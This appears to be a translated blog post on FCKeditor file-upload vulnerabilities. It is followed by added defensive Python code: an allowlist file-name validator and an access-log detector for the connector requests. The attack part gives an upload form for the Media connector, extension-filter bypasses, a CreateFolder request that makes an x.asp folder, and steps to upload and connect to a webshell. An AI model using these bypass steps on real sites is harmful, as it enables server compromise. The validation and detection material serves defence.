FCK editor upload vulnerability


Determining the installed version:

FCKeditor/_whatsnew.html

/fckeditor/editor/dialog/fck_about.html

Version 2.2: under Apache on Linux, append a trailing "." to the uploaded file name.

Versions <= 2.4.2 (PHP connector):

In the PHP upload handler, the Media type has no restriction on the uploaded file type, so a user can upload any file. Save the following as an HTML file and point the action attribute at the upload handler's address:

<form id="frmUpload" enctype="multipart/form-data" action="" method="post">
  <!-- set action to the FCKeditor upload handler URL, with Type=Media in its query string -->
  Upload a new file:<br>
  <input type="file" name="uploadfile" size="100"><br>
  <input id="btnUpload" type="submit" value="Upload">
</form>

Upload addresses for this version can also be found online. Try each in turn: create a folder named x.asp, upload an image-format webshell into it, and if the upload succeeds, view the page source to find the image URL, open it, and connect with Chopper.

FCKeditor file upload: bypassing the "." to "_" replacement:

In many cases an uploaded file named shell.php.rar or shell.php;.jpg is renamed to shell_php;.jpg. Submitting shell.php followed by a trailing space bypasses the rename; the trailing-space trick only works on Windows.

Second upload: uploading a file with the same name again yields shell.php;(1).jpg.

You can also create a directory; uploading files into that directory bypasses the filter.

Folder creation bypass: FCKeditor_2.5/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

This creates the nested directory recursively, and uploading a webshell into that directory bypasses the extension filter.

Copy the full address, view the page source to find the URL of the uploaded file, open it, and connect with Chopper.

You can also intercept the upload request and change the folder name c.asp to cc.asp, which bypasses the filter on c.asp and lets the webshell be uploaded into cc.asp.

In the proxy's Raw view, change %2F to cc.asp.
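The rename and folder tricks above all exploit a blacklist that checks only the final extension. As an added example, not FCKeditor's own code, the following allowlist policy for an image/media upload endpoint rejects each pattern the page lists: trailing dot or space, the ";" truncation, multi-extension names such as shell.php.rar (Apache multi-extension parsing), dotless-only folder names, percent-encoded separators and null bytes. The function names and the accepted-extension set are assumptions of the example.

```python
import re
import urllib.parse

# Added example, not FCKeditor code. Extensions an image/media endpoint should
# accept: an allowlist, rather than the blacklist FCKeditor 2.4.3 shipped with.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Interpreted or executable suffixes: the page's 2.4.3 deny list plus the
# asa/cer/pwml/pht suffixes it mentions. Any dot-separated segment matching one
# of these is rejected, so shell.php.rar and shell.php.jpg fail even though their
# last extension looks harmless (Apache may parse multiple extensions).
EXECUTABLE_EXTENSIONS = {
    "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "phtm", "inc",
    "asp", "aspx", "ascx", "asa", "cer", "jsp", "cfm", "cfc", "pl", "bat", "exe",
    "com", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "pwml", "pht",
}

# Strict character set for base names, extension segments and folder names.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_-]+")


def check_file_name(name):
    """Return (accepted, reason) for a proposed upload file name."""
    # Decode once so %2F, %00 and friends cannot smuggle separators past the checks.
    decoded = urllib.parse.unquote(name)
    if "\x00" in decoded:
        return False, "null byte in name"
    if "/" in decoded or "\\" in decoded:
        return False, "path separator in file name"
    if ";" in decoded:
        return False, "semicolon in name (IIS 6 treated it as the end of the name)"
    # Windows strips trailing dots and spaces when the file is written, which is
    # how shell.php. and 'shell.php ' end up as shell.php on disk.
    if decoded != decoded.strip() or decoded.endswith("."):
        return False, "leading/trailing space or trailing dot"
    base, *exts = decoded.split(".")
    if not exts:
        return False, "no extension"
    if not SAFE_SEGMENT.fullmatch(base):
        return False, "base name must match [A-Za-z0-9_-]+ (rejects .htaccess too)"
    for ext in exts:
        if ext.lower() in EXECUTABLE_EXTENSIONS:
            return False, "executable extension segment '%s'" % ext
        if not SAFE_SEGMENT.fullmatch(ext):
            return False, "bad extension segment '%s'" % ext
    if exts[-1].lower() not in ALLOWED_EXTENSIONS:
        return False, "extension '%s' not in allowlist" % exts[-1]
    return True, "ok"


def check_folder_name(name):
    """Return (accepted, reason) for a proposed folder name (one path component)."""
    decoded = urllib.parse.unquote(name)
    # No dots at all: a folder named x.asp is what makes IIS 6 execute its contents.
    if not SAFE_SEGMENT.fullmatch(decoded):
        return False, "folder name must match [A-Za-z0-9_-]+ (no dots, separators or spaces)"
    return True, "ok"


if __name__ == "__main__":
    # Constructed samples taken from the bypass patterns described on the page.
    for sample in ["photo.jpg", "shell.php.rar", "shell.php;.jpg", "shell.php.",
                   "shell.php ", "shell.php;(1).jpg", ".htaccess", "shell.php%00.jpg"]:
        print("file   %-20r -> %s" % (sample, check_file_name(sample)))
    for sample in ["images", "x.asp", "xx.asp%2Fx.asp", "cc.asp"]:
        print("folder %-20r -> %s" % (sample, check_folder_name(sample)))
```

The policy deliberately rejects every extension segment, not only the last one, and validates folder names with the same character set as file names, so the CreateFolder and intercept-and-rename variants fall to the same check as the file-name variants.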

Path disclosure vulnerability:

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

Insufficient filtering caused by FCKeditor's blacklist (passive) filtering strategy:

Affected versions: <= 2.4.3

In 2.4.3 the File category denies uploads with these extensions by default:

html\htm\php\php2\php3\php4\php5\phtml\inc\asp\aspx\ascx\jsp\cfm\cfc\pl\bat\exe\com\all\vbs\js\reg\cgi\htaccess\asis\sh\shtml\shtml\phtm

FCKeditor 2.0 through 2.2 allows uploading files with the asa, cer, php2, php4, inc, pwml and pht suffixes. The saved file path is built as $sFilePath = $sServerDir . $sFileName rather than from $sExtension, so on Windows appending a "." to the uploaded file name is enough to bypass the check.

Under Apache, the Apache multi-extension file name parsing flaw can also be used. When setting the Type variable for the upload, File is the recommended choice.
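The connector requests shown on this page (CreateFolder with an executable-suffixed folder name, GetFoldersAndFiles probing a CurrentFolder such as /shell.asp, and Media-type uploads on old PHP connectors) all leave their parameters in the web server's access log, so they can be detected after the fact. The following is an added example, not part of the original post: it parses constructed Apache combined-format log lines, scopes the rules to FCKeditor connector and upload paths, and reports one finding per rule per line. The log lines, rule identifiers and the reduced extension list are assumptions of the example.

```python
import re
import urllib.parse

# Added example, not FCKeditor code. Suffixes worth flagging when they appear in a
# folder parameter; a reduced starting list, extend it to match your servers.
EXECUTABLE_EXTENSIONS = {"asp", "aspx", "asa", "cer", "php", "php3", "php5",
                         "phtml", "jsp", "cgi", "htaccess", "shtml"}

# Apache combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log; the request paths are the connector URLs the page discusses.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Apr/2020:10:01:02 +0800] "GET /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ HTTP/1.1" 200 512
203.0.113.10 - - [12/Apr/2020:10:01:09 +0800] "GET /FCKeditor_2.5/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp HTTP/1.1" 200 96
203.0.113.10 - - [12/Apr/2020:10:01:15 +0800] "GET /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp HTTP/1.1" 500 1480
203.0.113.10 - - [12/Apr/2020:10:02:01 +0800] "POST /fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Media&CurrentFolder=/ HTTP/1.1" 200 210
198.51.100.7 - - [12/Apr/2020:10:02:30 +0800] "GET /images/photo.jpg HTTP/1.1" 200 34211
203.0.113.10 - - [12/Apr/2020:10:03:44 +0800] "GET /FCKeditor_2.5/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=xx%2Fcc.asp HTTP/1.1" 200 96
"""


def has_executable_segment(value):
    """True if any path component carries an executable suffix in any dot/semicolon part."""
    for segment in re.split(r"[/\\]", value):
        segment = segment.rstrip(". ")            # Windows drops trailing dots/spaces
        parts = re.split(r"[.;]", segment)[1:]    # everything after the first dot
        if any(p.lower() in EXECUTABLE_EXTENSIONS for p in parts):
            return True
    return False


def analyze_request(method, target):
    """Return a list of (rule_id, detail) findings for one request line."""
    url = urllib.parse.urlsplit(target)
    path = urllib.parse.unquote(url.path).lower()
    # Scope to FCKeditor connector/upload handlers only.
    if "fckeditor" not in path or not ("connector" in path or "upload" in path):
        return []
    params = {k.lower(): v[0] for k, v in
              urllib.parse.parse_qs(url.query, keep_blank_values=True).items()}
    findings = []
    # Rule A: CurrentFolder/NewFolderName naming a folder with an executable suffix
    # (the x.asp folder trick and the /shell.asp path-disclosure probe).
    hits = [k for k in ("currentfolder", "newfoldername")
            if k in params and has_executable_segment(params[k])]
    if hits:
        findings.append(("exec-ext-in-folder-param",
                         ", ".join("%s=%s" % (k, params[k]) for k in hits)))
    # Rule B: Media type on a connector/upload request (unrestricted on PHP <= 2.4.2).
    if params.get("type", "").lower() == "media":
        findings.append(("media-type-request", "%s %s" % (method, url.path)))
    # Rule C: percent-encoded separator inside NewFolderName (nested folder via one call).
    if re.search(r"newfoldername=[^&]*%2f", url.query, re.IGNORECASE):
        findings.append(("encoded-separator-in-folder-name", url.query))
    return findings


def scan_log(lines):
    """Return [(line_no, rule_id, detail), ...] over an iterable of log lines."""
    results = []
    for line_no, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule_id, detail in analyze_request(m.group("method"), m.group("target")):
            results.append((line_no, rule_id, detail))
    return results


if __name__ == "__main__":
    for line_no, rule_id, detail in scan_log(SAMPLE_LOG.splitlines()):
        print("line %d  %-32s %s" % (line_no, rule_id, detail))
```

Because the rules inspect query parameters rather than a fixed URL, they also catch the same commands issued against the browser/default connector variants; pair them with a check of the upload directories for files whose names contain an executable suffix segment, since the uploaded file name itself travels in the POST body and does not reach the access log.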

Source: blog.csdn.net/qq_41723615/article/details/105493956